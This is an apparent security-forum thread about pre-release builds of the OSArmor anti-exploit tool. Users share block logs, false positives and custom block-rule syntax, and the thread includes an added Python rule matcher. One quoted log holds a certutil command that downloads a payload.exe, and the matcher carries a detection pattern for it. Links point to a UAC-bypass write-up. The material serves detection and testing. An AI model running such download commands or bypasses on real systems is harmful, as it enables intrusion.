NoVirusThanks OSArmor: An Additional Layer of Defense

Discussion in 'other anti-malware software' started by novirusthanks, Dec 17, 2017.

  1. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,367
    Location:
    Italy
    :thumb:

    "eventvwr.exe" also presents the self-elevation instruction.
     
  2. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    1,550
    I got that one today, too. But I am still on Fall Creators.
     
  3. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,367
    Location:
    Italy
    Date/Time: 10/04/2018 19:20:02
    Process: [4496]C:\Windows\System32\MusNotification.exe
    Process MD5 Hash: B2DCDF528CF39533643C13FAD72842FC
    Parent: [1608]C:\Windows\System32\svchost.exe
    Rule: BlockSuspiciousProcesses
    Rule Name: Block execution of suspicious processes
    Command Line: C:\WINDOWS\system32\MusNotification.exe Display
    Signer:
    Parent Signer: Microsoft Windows Publisher
    User/Domain: SYSTEM/NT AUTHORITY
    Integrity Level: System
    Parent Integrity Level: System
     
  4. Azure Phoenix

    Azure Phoenix Registered Member

    Joined:
    Nov 22, 2014
    Posts:
    1,560
    Same
     
  5. Gandalf_The_Grey

    Gandalf_The_Grey Registered Member

    Joined:
    Jan 31, 2012
    Posts:
    1,189
    Location:
    The Netherlands
    Same situation, but no block here (yet)...
     
  6. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
    How can OSA block a bat file without setting a custom-block rule OR without having to tick to block ALL CMD-BAT etc.?

    What is the exact Custom-Block Rule syntax? I tried to set one yesterday and it just wouldn't take to block a bat file from a manual click and launch.

    I run a simple bat file in C:\Users\Username\AppData\Local\Temp and clicking on it launches it every time AFTER ERP 4 picks it up and I ALLOW it.

    The Lockdown / Experimental is looking good BTW. However, in testing I am getting this [Block processes located in suspicious folders] instead of [Block execution of unsigned processes on user space].
     
  7. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    Here is a new v1.4 (pre-release) test55:
    http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test55.exe

    *** Please do not share the download link, we will delete it when we release the official v1.4 ***

    So far this is what's new compared to the previous pre-release:

    + Fixed Block suspicious processes
    + Block "tricks" used to run UAC-bypass system processes
    + Block unsigned processes to run with high privileges
    + Block unsigned processes to run with system privileges
    + Renamed and improved UAC-bypass mitigation rules
    + Renamed Block execution of unsigned processes on Common AppData (\ProgramData\)
    + Readded Block execution of ALL "autoelevate" system processes
    + Fixed some false positives

    To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

    If you find any false positive or issue please let me know.

    Screenshot with new rules:

    osanew1.png

    @Sampei Nihira

    Added back "Block execution of ALL "autoelevate" system processes".

    Improved some things to reduce FPs.

    Do you want them to work also on XP? Currently they only work on Vista+ OS.

    @jdd58 @guest @shmu26 @Sampei Nihira @Azure Phoenix

    FPs should be fixed now.

    @aldist

    We'll add save of window size and custom MP3 audio (instead of beep) on next version.

    I wrote them on the todo list.

    @EASTER

    This should work (if the .bat file is executed via double-click, the parent is Explorer.exe):

    Code:
    [%PROCESS%: *\cmd.exe] [%PROCESSCMDLINE%: *.bat*] [%PARENTPROCESS%: C:\WINDOWS\Explorer.exe]
    
    // Tested:

    Code:
    Process: [4660]C:\Windows\System32\cmd.exe
    Parent: [3012]C:\Windows\explorer.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: cmd /c ""C:\Users\User\Desktop\test.bat" "
    
    To block .bat on \Temp\ folder (without checking Explorer.exe as parent):

    Code:
    [%PROCESS%: *\cmd.exe] [%PROCESSCMDLINE%: C:\Users\Username\AppData\Local\Temp\*.bat*]
    
     
    Last edited: Apr 10, 2018
  8. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
  9. aldist

    aldist Registered Member

    Joined:
    Nov 8, 2017
    Posts:
    1,115
    Location:
    Lunar module
    Thanks! .wav would be better, since normally all programs use .wav for alert sounds, and it will be easier for the user to find the right sound without having to convert it to .mp3.
     
  10. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,367
    Location:
    Italy
    No, that's okay, thank you.
    If I can count on the rule:

    "Block any processes executed from mmc.exe"

    ___________________________________________

    I can no longer find the rule below:

    "BlockSuspiciousCmdlines"

    Date/Time: 06/04/2018 00:50:53
    Process: [6084]C:\Windows\System32\certutil.exe
    Parent: [6020]C:\Windows\System32\cmd.exe
    Rule: BlockSuspiciousCmdlines
    Rule Name: Block execution of suspicious command-line strings
    Command Line: certutil -urlcache -split -f http://127.0.0.1:80/payload.exe
    Signer:
    Parent Signer:


    What is the rule that blocks Certutil now?
    TH.
     
    Last edited: Apr 11, 2018
  11. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    Sampei Nihira

    Main Protection -> Block execution of suspicious command-line strings

    osa.png
     
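    Added example (not OSArmor's own code, and not posted by novirusthanks or Sampei Nihira): a small matcher that evaluates rules written in the `[%FIELD%: pattern]` custom-block syntax from the reply to EASTER above against log records shaped like the cmd.exe and certutil.exe entries posted in this thread. The rule format, the case-insensitive glob matching, and the list of supported fields are assumptions read off the examples on this page, not documented OSArmor semantics; in particular, because the developer's second rule anchors the command-line pattern at `C:\Users\...` while the logged command line begins with `cmd /c "..."`, the example treats a `%PROCESSCMDLINE%` pattern as matching anywhere in the command line. The `certutil_download` rule is a constructed stand-in for the built-in "Block execution of suspicious command-line strings" protection, whose real rules are not on this page. Records 3 and 4 are constructed for the example.

```python
"""Evaluate OSArmor-style custom block rules against process-start log records.

Added example; assumptions (not confirmed by the thread):
  * a rule is one or more `[%FIELD%: pattern]` clauses, all of which must match;
  * patterns are case-insensitive globs, `*` matching any run of characters;
  * %PROCESS% / %PARENTPROCESS% patterns match the whole image path,
    %PROCESSCMDLINE% patterns match anywhere in the command line.
"""
import fnmatch
import re
from typing import Dict, List, Tuple

CLAUSE_RE = re.compile(r"\[%(\w+)%:\s*([^\]]*)\]")
PID_PREFIX_RE = re.compile(r"^\[\d+\]")           # strips "[4660]" from "Process:" lines

FIELD_MAP = {"PROCESS": "process", "PARENTPROCESS": "parent", "PROCESSCMDLINE": "cmdline"}


def parse_rule(rule: str) -> Dict[str, str]:
    """Turn '[%PROCESS%: *\\cmd.exe] [%PROCESSCMDLINE%: *.bat*]' into a field->pattern dict."""
    clauses = CLAUSE_RE.findall(rule)
    if not clauses:
        raise ValueError(f"no clauses found in rule: {rule!r}")
    parsed = {}
    for field, pattern in clauses:
        if field not in FIELD_MAP:
            raise ValueError(f"unsupported field %{field}%")
        parsed[FIELD_MAP[field]] = pattern.strip()
    return parsed


def parse_event(record: str) -> Dict[str, str]:
    """Parse a 'Process: / Parent: / Command Line:' block as posted in the thread."""
    event = {"process": "", "parent": "", "cmdline": ""}
    for line in record.strip().splitlines():
        key, _, value = line.partition(":")      # first ':' only; drive letters come later
        key, value = key.strip(), value.strip()
        if key == "Process":
            event["process"] = PID_PREFIX_RE.sub("", value)
        elif key == "Parent":
            event["parent"] = PID_PREFIX_RE.sub("", value)
        elif key == "Command Line":
            event["cmdline"] = value
    return event


def matches(rule: Dict[str, str], event: Dict[str, str]) -> bool:
    """All clauses must match; comparison is case-insensitive (explorer.exe vs Explorer.exe)."""
    for field, pattern in rule.items():
        value = event.get(field, "").lower()
        pat = pattern.lower()
        if field == "cmdline":
            pat = f"*{pat}*"                     # assumption: command-line patterns are unanchored
        if not fnmatch.fnmatchcase(value, pat):
            return False
    return True


def scan(rules: Dict[str, str], records: List[str]) -> List[Tuple[int, str]]:
    """Return (record index, rule name) for every record that a rule would block."""
    parsed_rules = {name: parse_rule(text) for name, text in rules.items()}
    hits = []
    for index, record in enumerate(records):
        event = parse_event(record)
        for name, rule in parsed_rules.items():
            if matches(rule, event):
                hits.append((index, name))
    return hits


def record(*lines: str) -> str:
    return "\n".join(lines)


RULES = {
    # the two rules novirusthanks posted for EASTER
    "bat_via_explorer": r"[%PROCESS%: *\cmd.exe] [%PROCESSCMDLINE%: *.bat*] [%PARENTPROCESS%: C:\WINDOWS\Explorer.exe]",
    "bat_in_temp": r"[%PROCESS%: *\cmd.exe] [%PROCESSCMDLINE%: C:\Users\Username\AppData\Local\Temp\*.bat*]",
    # constructed approximation of a suspicious-command-line rule for certutil as a downloader
    "certutil_download": r"[%PROCESS%: *\certutil.exe] [%PROCESSCMDLINE%: *-urlcache*-f*http*]",
}

LOG_RECORDS = [
    # 1: from the thread: cmd.exe started by double-clicking test.bat (parent explorer.exe)
    record(r"Process: [4660]C:\Windows\System32\cmd.exe",
           r"Parent: [3012]C:\Windows\explorer.exe",
           r'Command Line: cmd /c ""C:\Users\User\Desktop\test.bat" "'),
    # 2: from the thread: certutil fetching a payload over HTTP
    record(r"Process: [6084]C:\Windows\System32\certutil.exe",
           r"Parent: [6020]C:\Windows\System32\cmd.exe",
           r"Command Line: certutil -urlcache -split -f http://127.0.0.1:80/payload.exe"),
    # 3: constructed: a .bat in the user's Temp folder run by a non-Explorer parent
    record(r"Process: [5120]C:\Windows\System32\cmd.exe",
           r"Parent: [4100]C:\Users\Username\AppData\Local\Temp\dropper.exe",
           r'Command Line: cmd /c ""C:\Users\Username\AppData\Local\Temp\stage2.bat" "'),
    # 4: constructed: benign interactive cmd.exe from Explorer, no batch file involved
    record(r"Process: [2200]C:\Windows\System32\cmd.exe",
           r"Parent: [3012]C:\Windows\explorer.exe",
           r'Command Line: "C:\Windows\System32\cmd.exe" '),
]

if __name__ == "__main__":
    for index, name in scan(RULES, LOG_RECORDS):
        print(f"record {index + 1}: blocked by {name}")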

  12. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,367
    Location:
    Italy
    :thumb:

    I did this test:

    https://homjxi0e.wordpress.com/2018/01/26/uac-bypassing-using-fodhelper-method-regserver/

    100.jpg

    :D:D

    However, I will enable the ALL "autoelevate" rule.
     
  13. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    Here is a new v1.4 (pre-release) test56:
    http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test56.exe

    *** Please do not share the download link, we will delete it when we'll release the official v1.4 ***

    So far this is what's new compared to the previous pre-release:

    + Improved showing of main GUI via tray icon -> Show/Hide Window
    + Improved Block suspicious Svchost.exe process behaviors
    + Fixed some false positives

    To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

    If you find any false positive or issue please let me know.

    @Sampei Nihira

    Yes, many rules are inside "Block suspicious processes\command-lines" :)
     
  14. Charyb

    Charyb Registered Member

    Joined:
    Jan 16, 2013
    Posts:
    679
    I will be happy when this is released. I am ready for ERP beta to be placed at the forefront.
     
  15. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
    You are as anxious as I am about that. :D

    OSArmor is solidly awesome and ERP 4 is equally formidable in its granularity features etc.
     
  16. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    Uploaded a new video, used OSArmor 1.4 (pre-release) build 56 with default settings:

    PO0045.2018.doc Exploit Payload Blocked by OSArmor
    https://www.youtube.com/watch?v=LcSBZc-BbiI

     
  17. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,241
    Location:
    Among the gum trees
    No news about Windows Live Mail?
     
  18. aldist

    aldist Registered Member

    Joined:
    Nov 8, 2017
    Posts:
    1,115
    Location:
    Lunar module
    @novirusthanks
    Feature suggestion detected :) This is not important, but using a single click in the system tray instead of a double one would be much more convenient.
     
  19. loungehake

    loungehake Registered Member

    Joined:
    Mar 9, 2015
    Posts:
    201
    Location:
    Wigan
    The Windows 7 hanging problem has not gone away. I thought that it had been cured, but after several days of benefitting from the protection of OSArmor, the problem raised its head again. The affected computer is old and slow. I can shed little light except that it feels to me like a race condition is present and happens when this single-core processor computer is working very hard. I have no way of communicating evidence to the author about the occurrences. Fortunately my equally ancient Windows XP SP3 system runs great with OSArmor, so I shall be using it to prolong the usable life of it and continue to run applications not possible on later Windows.
     
  20. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    No Win 7 problems here on any machines fast or slow
     
  21. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,367
    Location:
    Italy
    @novirusthanks

    Interesting research that could be useful for OSA development/testing.
    Thanks to Daniel Bohannon.


    https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html
     
  22. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    1,550
    Something is not working right.
    I blocked cmd.exe, but it still launches from Search Everywhere. See screenshot:

    Capture.PNG
     
  23. aldist

    aldist Registered Member

    Joined:
    Nov 8, 2017
    Posts:
    1,115
    Location:
    Lunar module
    Add string in Custom Block-Rules:
    [%PROCESS%: *\cmd.exe]
    Or use Main Protections - Block execution of suspicious processes
     
    Last edited: Apr 12, 2018
  24. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
    I tried to duplicate that same bypass but OSA did block and indicate the Rule it arrived from.
    This is on my Windows 8.1 only though. Haven't tested that potential issue on Windows 10 and I don't have a 7.
    Playing musical O/S's over here. Today is 8.1's turn.
     
  25. aldist

    aldist Registered Member

    Joined:
    Nov 8, 2017
    Posts:
    1,115
    Location:
    Lunar module
    @novirusthanks
    When the computer turns off or reboots, the GPO policy is triggered and the network adapter is disabled.
    autoruns.png
    With version "test55" it works, with version "test56" it stopped working. There are no messages. When a reboot is performed with OSA protection disabled, the adapter is disabled, so some OSA rule prevents the normal execution of the policy.
    What rule does this do?
    PS
    When executing this .bat in normal mode, it executes without any messages from OSA.
     
    Last edited: Apr 12, 2018